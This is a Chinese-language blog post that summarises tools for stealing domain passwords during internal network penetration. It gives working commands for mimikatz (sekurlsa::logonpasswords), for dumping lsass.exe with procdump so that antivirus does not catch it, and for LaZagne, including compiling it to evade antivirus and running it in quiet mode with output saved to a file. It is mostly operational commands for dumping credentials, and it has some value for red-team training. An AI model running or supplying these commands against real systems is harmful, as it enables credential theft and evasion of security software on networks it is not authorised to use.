内网渗透之域内密码抓取方法总结

  • 内网渗透之域内密码抓取方法总结已关闭评论
  • 18 views
  • A+

一、mimikatz简介

mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从lsass.exe进程里获取windows处于active状态账号的明文密码或hash散列值。

mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器,还有很多强大的功能,今天只介绍密码抓取这部分内容。

1、下载地址

https://github.com/gentilkiwi/mimikatz

2、运行环境

需要以管理员权限启动,否则执行命令会报错,如下:

```

mimikatz64.exe

.#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / ## / Benjamin DELPY gentilkiwi ( [email protected] )
## / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com
/

mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz #
```

也就能解释往往在内网渗透实战环境中为啥要先提权,才能运行mimikatz,如果有杀软的存在那么还需要对mimikazt作免杀处理,免杀则又是另外一门技术研究话题了。

3、使用命令

```
privilege::debug # 提权

sekurlsa::logonpasswords # 抓取密码
```

wKg0C2E4cESAH8ePAABQzfoyAk200.png

二、Procdump简介

Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因,你还可以把它作为生成dump的工具使用在其他的脚本中。

1、下载地址

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

2、优点

不会被杀软查杀,省去了免杀的过程,加强了内网渗透抓取密码的效率,一般配合mimikazt使用来躲避杀软

3、lsass.exe介绍

lsass.exe进程用于本地安全和登陆策略,可在进程中查询

4、执行命令

将目标的 lsass.exe 转储成 dmp 文件(远程桌面),鼠标右键转储dmp文件

无法远程桌面情况下执行命令

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

管理员权限运行否则报错

运行成功,可以看到生成的lsass.dmp文件在procdump同目录下。

需将lsass.dmp移到mimikatz64.exe同目录

使用 mimikatz 从转储的 lsass.dmp 中来读取明文密码

mimikatz64.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

三、LaZagne简介

LaZagne是一款用于检索大量存储在本地计算机密码的开源应用程序。 因为每个软件储存密码的方式不尽相同(明文、API、定制算法、数据库等),所以该工具使用多种方法获取软件密码。

1、下载地址

https://github.com/AlessandroZ/LaZagne

2、安装环境

使用前需要安装python3和库:pip3 install -r requirements.txt

安装pyinstaller用于编译和打包:pip3 install pyinstaller

利用pyinstaller编译:pyinstaller --onefile -w lazagne.spec

我这个打包下来大概有22M(python打包的大小问题还需要大佬指正,太大不利于实战环境中使用),编译后可过免杀(亲测360和火绒可过),如果是直接用github上下载的exe无法直接抓取系统密码或者抓取有限,必须自己下载源码后,自行编译。

运行lazagne.py,看看效果吧

3、运行命令

1、启动所有模块,可抓取所有支持软件的密码

```
lazagne.exe all

要解密域凭据,可以指定用户Windows密码来完成。否则,它将尝试将所有已找到的密码作为Windows密码使用。

laZagne.exe all -password ZapataVive
```

2、仅抓取一类软件,如:仅抓取浏览器密码

lazagne.exe browsers

3、抓取特定一个软件的密码,如:火狐

lazagne.exe browsers -firefox

4、将找到的所有密码写到文件中

```

普通txt为-oN,Json为-oJ,所有为-oA

lazagne.exe all -oN
lazagne.exe all -oA -output C:UsersxxxDesktop
```

5、帮助命令

lazagne.exe -h
lazagne.exe browsers -h

6、详细模式

lazagne.exe all -vv

7、安静模式(标准输出上不会打印任何内容)

lazagne.exe all -quiet -oA

目前支持的软件

| | *Windows | *Linux | *Mac* |
| ------------------------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------- |
| Browsers | 7Star

Amigo

BlackHawk

Brave

Centbrowser

Chedot

Chrome Canary

Chromium

Coccoc

Comodo Dragon

Comodo IceDragon

Cyberfox

Elements Browser

Epic Privacy Browser

Firefox

Google Chrome

Icecat

K-Meleon

Kometa

Microsoft Edge

Opera

Orbitum

Sputnik

Torch

Uran

Vivaldi

| Brave

Chromium

Dissenter-Browser

Firefox

Google Chrome

IceCat

Microsoft Edge (Beta/Dev)

Opera

SlimJet

Vivaldi | Chrome

Firefox |
| Chats | Pidgin

Psi

Skype | Pidgin

Psi | |
| Databases | DBVisualizer

Postgresql

Robomongo

Squirrel

SQLdevelopper | DBVisualizer

Squirrel

SQLdevelopper | |
| Games | GalconFusion

Kalypsomedia

RogueTale

Turba | | |
| Git | Git for Windows | | |
| Mails | Outlook

Thunderbird | Clawsmail

Thunderbird | |
| Maven | Maven Apache

| | |
| Dumps from memory | Keepass

Mimikatz method | System Password | |
| Multimedia | EyeCON

| | |
| PHP | Composer

| | |
| SVN | Tortoise | | |
| Sysadmin | Apache Directory Studio

CoreFTP

CyberDuck

FileZilla

FileZilla Server

FTPNavigator

OpenSSH

OpenVPN

KeePass Configuration Files (KeePass1, KeePass2)

PuttyCM

RDPManager

VNC

WinSCP

Windows Subsystem for Linux | Apache Directory Studio

AWS

Docker

Environnement variable

FileZilla

gFTP

History files

Shares

SSH private keys

KeePass Configuration Files (KeePassX, KeePass2)

Grub | |
| Wifi | Wireless Network | Network Manager

WPA Supplicant | |
| Internal mechanism passwords storage | Autologon

MSCache

Credential Files

Credman

DPAPI Hash

Hashdump (LM/NT)

LSA secret

Vault Files | GNOME Keyring

Kwallet

Hashdump | Keychains

Hashdump |

相关推荐: 黑客系列:你的Ansible包配置安全吗?

译文来源:https://blog.includesecurity.com/2021/06/hack-series-is-your-ansible-package-configuration-secure/。受个人知识所限或偏见影响,部分内容或存在过度曲解误解…